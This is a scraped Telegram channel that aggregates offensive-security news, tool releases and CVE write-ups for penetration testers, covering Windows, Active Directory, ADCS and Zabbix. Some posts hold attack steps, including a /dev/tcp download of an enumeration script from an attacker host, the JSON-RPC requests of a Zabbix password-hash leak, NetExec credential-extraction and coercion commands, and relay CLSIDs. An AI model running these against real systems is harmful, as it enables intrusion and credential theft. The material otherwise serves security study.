Pentester's Backlog
@pentestbacklog
590 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
About
Blog
Apps
Platform
Join
Pentester's Backlog
590 subscribers
Pentester's Backlog
Forwarded from APT
This media is not supported in your browser
VIEW IN TELEGRAM
💻 Exploiting Windows Kernel via Kernel Streaming Proxying

An in-depth look at CVE-2024-30090, a vulnerability in Kernel Streaming, allowing privilege escalation via malformed IOCTL requests. By leveraging KS Event mishandling during 32-bit to 64-bit conversions, can exploit the bug pattern to gain arbitrary kernel mode access.

🔗 Research:
Proxying to Kernel - Part I
Proxying to Kernel - Part II

🔗 Source:
https://github.com/Dor00tkit/CVE-2024-30090

#windows #streaming #kernel #cve #poc
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱21
276 views
Pentester's Backlog
Forwarded from APT
🔔Call and Register — Relay Attack on WinReg RPC Client

A critical vulnerability (CVE-2024-43532) has been identified in Microsoft’s Remote Registry client. This flaw allows attackers to exploit insecure fallback mechanisms in the WinReg client, enabling them to relay authentication details and make unauthorized certificate requests through Active Directory Certificate Services (ADCS).

🔗 Research:
https://www.akamai.com/blog/security-research/winreg-relay-vulnerability

🔗 RPC Visibility Tool:
https://github.com/akamai/akamai-security-research/tree/main/rpc_toolkit/rpc_visibility

🔗 PoC:
https://github.com/akamai/akamai-security-research/tree/main/PoCs/cve-2024-43532

#ad #adcs #rpc #ntlm #relay #etw #advapi
🥱2
308 views
Pentester's Backlog
Forwarded from Offensive Xwitter
😈 [ Steph @w34kp455 ]

Call it the biggest #NTLM #password database or monstrous #MD5 leak, but on, you can find precomputed datasets for various wordlists and different hashes - all free!
FYI: all_in_one.latin.txt for NTLM contains 26.5 billion pairs of hash:password inside!🔥

🔗 http://weakpass.com

🐥 [ tweet ]
🥱21
401 views
Pentester's Backlog
🤣32😁1🤔1🗿1
369 views
Pentester's Backlog
Forwarded from offsec notes
Gitlab checks
* Reconnaissance - Link
* Abusing GitLab Runners - Link
* Script for steal tasks by requesting them faster than a real runner - Link
GitHub
GitHub - Frichetten/gitlab-runner-research: Research on abusing GitLab Runners
Research on abusing GitLab Runners. Contribute to Frichetten/gitlab-runner-research development by creating an account on GitHub.
🔥1🥱1
321 views
Pentester's Backlog
Forwarded from Offensive Xwitter
😈 [ Thomas Roccia 🤘 @fr0gger_ ]

New LOL project, LOLAD a collection of Active Directory techniques!👇

🔗 https://lolad-project.github.io/

🐥 [ tweet ]
1🥱1
329 views
Pentester's Backlog
Forwarded from 1N73LL1G3NC3
ShadowDumper

It uses 7 advanced techniques to dump LSASS memory.

Capabilities:
• Unhooked Injection (Modified Mimikatz Binary) – Utilizes unhooking to inject a modified Mimikatz binary, bypassing EDR hooks and evading detection.
• Unhooked Injection (Direct Syscalls with MDWD) – Implements direct syscalls for stealthy injection using MDWD, reducing the footprint left behind.
• Simple MiniDumpWriteDump API – Executes the straightforward MiniDumpWriteDump API method for standard LSASS memory extraction.
• MINIDUMP_CALLBACK_INFORMATION Callbacks – Uses callback functions for custom handling, offering greater control over the dumping process.
• Process Forking Technique – Forks the LSASS process, creating a memory clone and avoiding direct access to the target process.
• Direct Syscalls with MiniDumpWriteDump – Combines direct syscalls with MiniDumpWriteDump, enhancing stealth by avoiding typical API hooks.
• Native Dump with Direct Syscalls (Offline Parsing) – Leverages direct syscalls to create a native dump with essential streams for offline parsing, perfect for low-noise operations.
2👍2🔥2🥱1🎃1
302 views
Pentester's Backlog
Forwarded from cKure Red
🧬 GitHub Enterprise SAML Authentication Bypass (CVE-2024-4985 / CVE-2024-9487).

https://projectdiscovery.io/blog/github-enterprise-saml-authentication-bypass
Please open Telegram to view this post
VIEW IN TELEGRAM
🥱1😎1
289 views
Pentester's Backlog
Forwarded from SecuriXy.kz
Представьте ситуацию, когда на Linux машину нужно что-то положить но на машине нет привычных стредств типа wget, curl и даже по scp никак.

LoL (living off the land) трюк по загрузке файлов на Linux хост. Будет полезно на всяких экзаменах типа OSCP и тп.


>exec 3<>/dev/tcp/<kali-ip>/22

>echo -e "GET /linpeas.sh HTTP/1.1\r\nHost: <kali-ip>\r\nConnection: close\r\n\r\n" >&3

>cat <&3 > linpeas.sh


#linux #lol #upload #tips
🥱3😈2🔥1
312 views
Pentester's Backlog
Forwarded from PenTestGit
https://github.com/MzHmO/Exploit-Street/

#exploit #windows #infra
GitHub
GitHub - MzHmO/Exploit-Street: Complete list of LPE exploits for Windows (starting from 2023)
Complete list of LPE exploits for Windows (starting from 2023) - MzHmO/Exploit-Street
🔥2
307 views
Pentester's Backlog
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Форк знаменитой утилиты certipy with many open pull requests merged, made compatible with each other, and tested

https://github.com/zimedev/certipy-merged

Missing PRs:
211: fix ESC1 false positive
229: add smime extensions support (somehow does not work completely with certipy auth)

Merged PRs:
231: add ldap simple auth
228: add ESC15
226: fix ESC1 false positive
225: fix to solve SID overwrite errors
222: fix to allow certificate names with slashes or parentheses
210: add cross domain authentication
209: accept tgs other than HOST/target@domain
203: check web enrollment for https
201: add dcom support
200: add possibility to add more than 1 keycredential and correctly list them
198: add ldap-port option
196: add ESC13
193: add whencreated and whenmodified for templates
183: hidden import (pycryptodomex)


P.S. главное, что tested...

#soft #pentest #adcs #ad
GitHub
GitHub - zimedev/certipy-merged: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - zimedev/certipy-merged
🥱2
289 views
Pentester's Backlog
Forwarded from APT
📜 ADCS Attack Techniques Cheatsheet

This is a handy table outlining the various methods of attack against Active Directory Certificate Services (ADCS)

🔗 Source:
https://docs.google.com/spreadsheets/d/1E5SDC5cwXWz36rPP_TXhhAvTvqz2RGnMYXieu4ZHx64/edit?gid=0#gid=0

#ad #adcs #esc #cheatsheet
Google Docs
ADCS Attack Techniques Cheatsheet
🥱2
264 views
Pentester's Backlog
Forwarded from Offensive Xwitter
😈 [ ap @decoder_it ]

M'm glad to release the tool I have been working hard on the last month: #KrbRelayEx
A Kerberos relay & forwarder for MiTM attacks!
>Relays Kerberos AP-REQ tickets
>Manages multiple SMB consoles
>Works on Win& Linux with .NET 8.0
>...

GitHub:
🔗 https://github.com/decoder-it/KrbRelayEx

🐥 [ tweet ]
🥱1
259 views
Pentester's Backlog
Forwarded from Path Secure (CuriV)
Хей, хей!

Статья-рефлексия по итогам OSCP c пылу с жару на Хабр.

Получилась довольно хорошо. Рад, что удалось добраться и зафиксировать свой опыт. Содержание статьи:

1. Введение
2. Подготовка
3. Первая попытка
4. Вторая попытка
5. Заключение
6. Конспект обработанных рекомендаций из разных видео по OSCP

Еще загрузил свой читшит. Туда же положу шаблон отчета в формате markdown:
https://github.com/curiv/oscp-cheatsheet

Буду очень рад реакциям, репостам, комментариям и вопросам. Стрим с раззбором все ещё в силе. Заранее сделаю анонс

#certification #oscp #article
Хабр
Системный подход к успешной сдаче OSCP 2024
Введение Широко известная в узких кругах организация «Offensive Security» является флагманом в области кибербезопасности, предлагая специалистам уникальные образовательные программы и сертификационные...
2🙈2🥴1🙉1🙊1
284 views
Pentester's Backlog
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Почему я люблю смотреть отчеты? Например из этого можно взять мануал вот такую картинку))

#pentest #redteam #av #report
🙈1🙉1🙊1
276 views
Pentester's Backlog
Forwarded from Offensive Xwitter
😈 [ drm @lowercase_drm ]

Coffee break thoughts: "is it possible to bruteforce RPC endpoint to perform code exec if you can't access EPM/SMB?"

99% impacket atexec + 1% "for loop" = 100% prod ready
(silent command only)
h/t @saerxcit
🌻

🔗 https://gist.github.com/ThePirateWhoSmellsOfSunflowers/3673746454aef7d55a5efed4dc4e1a61

🐥 [ tweet ]
🤔1🙈1🙉1🙊1
300 views
Pentester's Backlog
Forwarded from Offensive Xwitter
😈 [ ap @decoder_it ]

OK, I promise to stop spamming about relays with NTLM/Kerberos 😅. But if you're a member of the Distributed COM or Performance Log group, these juicy CLSIDs let you trigger remotely machine authentication of any computer, including DCs, and relay DCOM -> HTTP, SMB:

{9EA82395-E31B-41CA-8DF7-EC1CEE7194DF}
{42C21DF5-FB58-4102-90E9-96A213DC7CE8}
{C63261E4-6052-41FF-B919-496FECF4C4E5}
{FFE1E5FE-F1F0-48C8-953E-72BA272F2744}

🐥 [ tweet ]
🙈3🙉3🙊3
344 views
Pentester's Backlog
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-38193: Windows LPE

PATCHED: August 13, 2024

https://github.com/Nephster/CVE-2024-38193

P.S. Протестил на Win11, работает

#git #exploit #lpe #pentest #redteam
2🤯1
234 views
Pentester's Backlog
Forwarded from Укротитель змей
CVE-2024-42327 в Zabbix
1 декабря наткнулся на уязвимость CVE-2024-42327 и решил ее изучить, прочитав пару постов, было сказано, что злоумышленник может внедрять произвольные SQL запросы. Нашел PoC и немного удивился, провел ресерч и ничего общего с SQLi не увидел. Давайте разберемся, о чем же эта бага.

CVE-2024-42327 - это крит уязвимость (CVSS 9.9), связанная с JSON-RPC API Zabbix. Она позволяет хакеру с минимальными правами (пользователь с доступом к API) извлекать конфиденциальные данные о других учетных записях, включая имена, фамилии, идентификаторы и хэшированные пароли. Проблема кроется в неправильной проверке авторизации и прав доступа, а не в манипуляции SQL запросами. Уязвимость базируется на логической ошибке в реализации API. Метод user.get предоставляет доступ к данным, которые не должны быть видны пользователю с минимальными правами. Злоумышленник использует легитимные методы API, такие как user.login и user.get. Запросы передаются в формате JSON, и сервер возвращает ответ.

Результаты запроса включают:
Имя пользователя (username),
Имя (name) и фамилию (surname),
Идентификатор пользователя (userid),
Хэш пароля (passwd)

Внутри исходника присутствует аргумент selectRole в запросе API и может создать впечатление работы с SQL запросами, так как он содержит поля, такие как roleid и u.passwd. Однако это параметры API, а не запросы к БД.

в PoC запускается скрипт cve-2024-42327.py и в нем присутствуют важные этапы.

Первый этап: Аутентификация через API
Метод user.login используется для получения токена сессии, необходимого для выполнения запросов.
{
    "jsonrpc": "2.0",
    "method": "user.login",
    "params": {
        "username": "guest",
        "password": "guest_password"
    },
    "id": 1
}

После этого сервер возвращает токен 
{
    "jsonrpc": "2.0",
    "result": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

Второй этап: Перебор идентификаторов пользователей. После получения токена, скрипт вызывает метод user.get, перебирай ID пользователей
{
    "jsonrpc": "2.0",
    "method": "user.get",
    "params": {
        "selectRole": ["roleid, u.passwd", "roleid"],
        "userids": "1"
    },
    "auth": "a43530e0eff1f1ce828cc04dca95eb14",
    "id": 1
}

В ответе возвращаются данные с хэшированным паролем 
{
    "jsonrpc": "2.0",
    "result": [
        {
            "userid": "1",
            "username": "Admin",
            "name": "Zabbix",
            "surname": "Administrator",
            "passwd": "$2y$10$92nDno4n0Zm7Ej7Jfsz8WukBfgSS/U0QkIuu8WkJPihXBb2A1UrEK"
        }
    ],
    "id": 1
}

Чтобы провернуть эту схему, нужно иметь доступ к JSON-RPC API Zabbix, чаще всего у него такой эндпоинт.
http://zabbix/api_jsonrpc.php

И учетка с минимальными правами, которая может дернуть метод user.login.
Уязвимые версии:
Zabbix 6.0.0–6.0.31
Zabbix 6.4.0–6.4.16
Zabbix 7.0.0.

cve-2024-42327.py -u http://zabbix/api_jsonrpc.php -n Vanya -p Qwerty123

PoC
2👍1🔥1😁1
278 views
Pentester's Backlog
Forwarded from HaHacking
🗂 #заметки #offense #web

➡️Полезный репозиторий на случай тестирования функциональности загрузки файлов – сборник маленьких, но синтаксически валидных файлов самых разных форматов, готовых для встраивания в них Ваших пейлоадов:

   🧩 mathiasbynens/small

▪️Краткий список расширений:
adb, appcache, avi, awk, bat, bf, bmp, bpg, bz2, c, chicken, chm, class, clj, cljc, cljs, clp, cob, coffee, com, cpp, cr, cs, css, dcm, dol, e, ex, exe, f, f90, flv, gif, go, groovy, gz, h, heif, hs, html, i, i7x, icc, ico, inf, java, jp2, jpg, js, json, jsonp, jxl, lua, m, macho, macho-ml, malbolge, md, ml, mng, mp3, mp4, ni, nim, o, opa, pas, pbm, pdf, pgm, php, pl, pml, png, ppm, py, rar, rb, rs, rtf, scala, sh, svg, swf, swift, t, tar, tga, tif, toml, ts, vs, wasm, wav, webm, webp, wmf, wmv, ws, xbm, xhtml, xml, yml, zip


▪️Полный список форматов:
ada.adb, manifest.appcache, AudioVideoInterleave.avi, awk.awk, batch.bat, brainfuck.bf, bmp.bmp, bpg.bpg, bzip2.bz2, c.c, chicken.chicken, compiledhtml.chm, java-class.class, clojure.clj, clojure.cljc, clojurescript.cljs, jess.clp, cobol.cob, coffeescript.coffee, doscommand-empty.com, doscommand.com, cpp.cpp, crystal.cr, csharp.cs, css.css, dicom.dcm, dolphin.dol, eiffel.e, elixir.ex, dosexecutable.exe, linearexecutable.exe, newexecutable.exe, portableexecutable-xp.exe, portableexecutable.exe, fortran-77.f, fortran-90.f90, FlashVideo.flv, gif-transparent.gif, gif.gif, go.go, groovy.groovy, gzip-name.gz, gzip.gz, c.h, heif.heif, haskell_loop.hs, haskell_term.hs, html-2.0.html, html-3.2.html, html-4.0-strict.html, html-4.01-frameset.html, html-4.01-strict.html, html-4.01-transitional.html, html5.html, iso-html.html, xhtml-1.0-frameset.html, intercal.i, i.i7x, icc.icc, ico.ico, inform-6.inf, java.java, jpeg2.jp2, jpeg.jpg, javascript.js, json.json, json-p.jsonp, jxl.jxl, lua.lua, objective-c.m, macho, macho-ml, malbolge.malbolge, markdown.md, ocaml.ml, mng.mng, mp3.mp3, Mpeg4.mp4, mp4-with-audio.mp4, story.ni, nim.nim, elf.o, opa.opa, pascal.pas, pbm.pbm, pbmb.pbm, pdf.pdf, pgm.pgm, pgmb.pgm, php.php, perl.pl, promela.pml, png-transparent.png, png-truncated.png, ppm.ppm, ppmb.ppm, python.py, rar14.rar, rar4.rar, rar5.rar, ruby.rb, rust.rs, rtf.rtf, scala.scala, shell.sh, svg.svg, flash.swf, swift.swift, tads-3.t, tar.tar, targa.tga, tiff.tif, toml.toml, typescript.ts, vertex-shader.vs, webassembly.wasm, wav.wav, webm.webm, webp.webp, WindowsMetafile.wmf, WindowsMediaVideo.wmv, whitespace.ws, x-bitmap.xbm, xhtml-1.0-strict.xhtml, xhtml-1.1.xhtml, xhtml-basic-1.0.xhtml, xhtml-basic-1.1.xhtml, xhtml5.xhtml, xml-1.0-valid.xml, xml-1.0.xml, xml-1.1-valid.xml, xml-1.1.xml, yaml.yml, zip.zip



Полезный репозиторий на случай тестирования такой функциональности (и браузеров) на уязвимость к Denial-of-Service – большая картинка PNG формата минимального размера;

   🧩 korczis/big-png
🧩  bamsoftware.com/hacks/deflate

▪️PNG изображение 6_132_534 байта (5.8 Мб)
▪️225_000 × 225_000 пикселей
▪️при представлении в качестве буфера пикселей по 3 байта / пиксель➡️141.4 Гб



@HaHacking 🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
248 views
Pentester's Backlog
Forwarded from haxx
🛠 Как-то незаметно прошел релиз NetExec 1.3.0, а туда тем временем добавили несколько интересных вещей.

Вывод инфы по доступным интерфейсам, так что поиск пивота стал гораздо приятнее.
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' --interfaces


Проверка на всякие Coerce штуки (PetitPotam, DFSCoerce, PrinterBug, MSEven, ShadowCoerce). Подробнее тут 
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M coerce_plus


Энум SCCM через LDAP (RECON-1) . Подробнее тут 
nxc ldap 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M sccm -o REC_RESOLVE=TRUE


Извлечение паролей из истории команд PowerShell
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M powershell_history -o export=True


Статус Bitlocker по дискам
nxc smb 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlocker

nxc wmi 192.168.13.37 -u 'USERNAME' -p 'LOLKEKPOHEK' -M bitlocker



В общем, есть с чем поиграться. Более подробно можно посмотреть тут или тут
🔥1
261 views